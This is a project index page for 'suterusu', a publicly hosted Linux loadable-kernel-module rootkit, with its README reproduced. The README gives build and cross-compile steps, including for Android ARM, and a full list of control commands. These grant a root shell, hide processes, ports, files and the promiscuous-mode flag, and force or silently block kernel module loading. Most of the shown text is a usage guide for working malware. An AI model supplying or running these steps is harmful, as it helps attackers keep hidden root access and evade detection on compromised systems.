Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/mncoppola/suterusu

An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM
https://github.com/mncoppola/suterusu

Last synced: 2 months ago
JSON representation

An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM

Host: GitHub
URL: https://github.com/mncoppola/suterusu
Owner: mncoppola
License: mit
Created: 2013-10-11T23:17:18.000Z (about 11 years ago)
Default Branch: master
Last Pushed: 2017-11-21T10:17:53.000Z (about 7 years ago)
Last Synced: 2024-08-01T19:43:37.864Z (5 months ago)
Language: C
Size: 41 KB
Stars: 636
Watchers: 52
Forks: 210
Open Issues: 5
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

README

        Suterusu

========

Typical compilation steps:

    $ wget http://kernel.org/linux-x.x.x.tar.gz

    $ tar xvf linux-x.x.x.tar.gz

    $ cd linux-x.x.x

    $ make menuconfig

    $ make modules_prepare

    $ cd /path/to/suterusu

    $ make linux-x86 KDIR=/path/to/kernel

To compile against the currently running kernel (kernel headers installed):

    $ make linux-x86 KDIR=/lib/modules/$(uname -r)/build

If a specific toolchain is desired for cross-compilation, provide the

CROSS_COMPILE variable during make:

    $ make android-arm CROSS_COMPILE=arm-linux-androideabi- KDIR=/path/to/kernel

To compile the command binary:

    $ gcc sock.c -o sock

Commands

========

Root shell

    $ ./sock 0

Hide PID

    $ ./sock 1 [pid]

Unhide PID

    $ ./sock 2 [pid]

Hide TCPv4 port

    $ ./sock 3 [port]

Unhide TCPv4 port

    $ ./sock 4 [port]

Hide TCPv6 port

    $ ./sock 5 [port]

Unhide TCPv6 port

    $ ./sock 6 [port]

Hide UDPv4 port

    $ ./sock 7 [port]

Unhide UDPv4 port

    $ ./sock 8 [port]

Hide UDPv6 port

    $ ./sock 9 [port]

Unhide UDPv6 port

    $ ./sock 10 [port]

Hide file/directory

    $ ./sock 11 [name]

Unhide file/directory

    $ ./sock 12 [name]

Hide network PROMISC flag

    $ ./sock 13

Unhide network PROMISC flag

    $ ./sock 14

Enable module loading (force kernel.modules_disabled=0)

    $ ./sock 15

Silently prohibit module loading (neutralize future loaded modules)

    $ ./sock 16

Silently re-permit module loading (undo command 16)

    $ ./sock 17

File/directory hiding

---------------------

At the moment, file/dir hiding only hides names on the / filesystem.  Note that names are hidden, not paths.  For instance, giving the name ".blah" to Suterusu will hide the name ".blah" in all directories on the filesystem.